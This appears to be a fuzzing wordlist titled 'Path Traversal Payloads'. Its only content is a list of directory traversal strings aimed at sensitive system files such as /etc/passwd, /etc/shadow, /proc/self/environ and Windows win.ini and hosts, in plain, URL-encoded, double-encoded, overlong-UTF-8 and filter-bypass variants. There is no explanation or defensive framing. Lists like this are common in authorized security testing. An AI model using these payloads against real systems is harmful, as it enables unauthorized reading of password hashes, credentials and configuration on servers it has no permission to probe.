# Path Traversal Payloads
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../etc/shadow
../../etc/shadow
../../../etc/shadow
../../../../etc/shadow
../windows/system32/drivers/etc/hosts
../../windows/system32/drivers/etc/hosts
../../../windows/system32/drivers/etc/hosts
../../../../windows/system32/drivers/etc/hosts
..%2fetc%2fpasswd
..%2f..%2fetc%2fpasswd
..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2fetc%2fpasswd
%2e%2e/etc/passwd
%2e%2e/%2e%2e/etc/passwd
%2e%2e/%2e%2e/%2e%2e/etc/passwd
..%252fetc%252fpasswd
..%252f..%252fetc%252fpasswd
..%c0%afetc%c0%afpasswd
..%c0%af..%c0%afetc%c0%afpasswd
....//etc/passwd
....//....//etc/passwd
....//....//....//etc/passwd
..\/etc/passwd
..\/..\/etc/passwd
..\/..\/..\/etc/passwd
/etc/passwd
/etc/shadow
/etc/hosts
/proc/self/environ
/proc/version
/proc/cmdline
C:\windows\system32\drivers\etc\hosts
C:\boot.ini
C:\windows\win.ini
....\\etc\\passwd
..\\..\\etc\\passwd
..\\..\\..\\etc\\passwd
file:///etc/passwd
file:///etc/shadow
